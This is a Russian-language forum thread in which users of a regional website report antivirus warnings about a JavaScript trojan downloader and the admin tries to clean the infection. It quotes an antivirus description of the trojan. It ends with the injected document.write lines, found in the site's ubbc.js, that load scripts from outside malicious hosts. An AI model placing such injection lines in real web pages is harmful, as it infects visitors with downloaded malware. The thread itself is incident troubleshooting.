Захожу и вирус!

[Пермяк]

Вот такая вот хрень как только захожу..

 

[KAN]

Такая же фигня... ТОлько в Авасте... Вчера...

 

[Пермяк]

У меня в Файрфокс и Эксплорере, Опера не дает вируса,но она стала тормозить и я ее убрал..

 

[Oelun]

+ 1. Каспер регулярно ловит-блокирует троян, когда захожу сюда. Только, пожалуй, не на этой неделе, а в сентябре.  

 

[kladperm]

периодически какой-то гребанный хакер-спамер привешивает сюда эту дрянь.

 

[bay59]

Опять  Троян (JS: Downloader-EX [Trj]) на форуме .

 

[Pol1]

Опять  Троян (JS: Downloader-EX [Trj]) на форуме .

у меня такую гадость показывает, причем на каждой странице...

Андрей, Дима, сделайте уже чего нибудь с ним

Поведение Trojan-Downloader-троянский загрузчик.

Технические детали:
Программа написана на скриптовом языке JavaScript. Производит скрытную загрузку из интернета другой троянской программы на компьютер пользователя. Сохраняет ее на диск, используя уязвимость в компоненте ActiveX ADODB.Stream. Размер скрипта обычно находится в пределах 2-5 КБ, он внедряется в HTML-страницу при ее создании.

Загружает из интернета другую троянскую программу (ее адрес формируется в процессе работы) и сохраняет по одному из следующих путей (производит попытку перезаписать Media Player):

C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe
C:\\Program Files\\Windows Media Player\\wmplayer.exe
C:\\Program\\Windows Media Player\\wmplayer.exe
C:\\Programas\\Windows Media Player\\wmplayer.exe
C:\\Programfiler\\Windows Media Player\\wmplayer.exe
C:\\Programme\\Windows Media Player\\wmplayer.exe
C:\\Programmer\\Windows Media Player\\wmplayer.exe
C:\\Programmi\\Windows Media Player\\wmplayer.exe

Других вредоносных действий не производит.

 

[admin]

Да уже устал с ним бороться. Только вычищу - опять начинается. Скорее всего у ппиц на серваке проблемы с этой хернёй. Надо менять хостера...

 

[Пермяк]

Сейчас уже другой

 

[Пермяк]

И вот место где обнаружено

обнаружено: троянская программа Packed.JS.Agent.bd      URL: http://co.fayette.tx.us/images/commissioners.php
Причем здесь Форум?  Может это подвох какой?

 

[bazzookka]

попробуй на папки и файлы поставить права только на чтение. если все равно влазит зараза, то оч вероятно что у хостера проблемы.

еще как вариант сменить все пароли и проверить движок форума на дырки. возможно откопали свежую уязвимость и через нее лазят.

 

[admin]

попробуй на папки и файлы поставить права только на чтение. если все равно влазит зараза, то оч вероятно что у хостера проблемы.

еще как вариант сменить все пароли и проверить движок форума на дырки. возможно откопали свежую уязвимость и через нее лазят.

С правами косяк такой получается, вечером, например, ставлю на файл шаблона форума права 444, а с утра там уже 777 и всякие скрипты напиханы :-?  Дыра в движке форума отпадает, т.к. html-файлы не форумных страниц сайта периодически страдают той-же хернёй. Варианта 2, либо у хостера на серваке вирусняк гуляет, либо происходит левый доступ к фтп-папке форума. Хостеру описал, пароли сменил, ждёмс...

 

[bazzookka]

левый доступ либо через фтп либо через заныканный скриптик в какой нить из папок. в идеале, проглядеть логи апача за ночное время - вызовы каких файлов были.

хорошо бы было сравнить содержимое файлов из дистрибутива форума и тех, которые сейчас работают, могет быть какую нить особую функцию внедрили. она же могет и пароли тырить.

и проверьте компы, с которых ползаете на сайт - было такое что сидели трояны, сливающие пароли к сайту, и особая какая то вирусня, которая html и php файлы поражала.

заодно капчу в регистрации приделайте похитрее

 

[Matros]

Убейте уже его кто-нибудь, достал этот вирус, третий день сидит.

 

[Uncle_Serg]

Странно, у меня антивирус - Dr.Web. Ничего не говорит, и в логах чисто

 

[admin]

Вроде всё вычистил. У меня нод32 обновлённый молчит.
Володя, напиши, плиз, дословно на что ругается антивирь у тебя.

 

[Пермяк]

Вот Дима.. Может Каспер глючит? Спецом срабатывавает чтоб очки заработать?

 

[Indi_Jons]

токаяже херня

 

[Пермяк]

Сейчас удивительно зашел и..тишина..

 

[bazzookka]

ничего не тишина. смотрите сами - в начале каждой страницы подгружается файл через джаваскрипт script language="JavaScript1.2" src="http:  //klad.perm.ru/yabbfiles/ubbc.js". в конце файла стоят строки
document.write(\'<script src=http://alfajraljadeed.com/js/printd.php ><\\/script>\');
document.write(\'<script src=http://alfajraljadeed.com/js/printd.php ><\\/script>\');
document.write(\'<script src=http://alfajraljadeed.com/js/printd.php ><\\/script>\');
document.write(\'<script src=http://alfajraljadeed.com/js/printd.php ><\\/script>\');
document.write(\'<script src=http://co.fayette.tx.us/images/commissioners.php ><\\/script>\');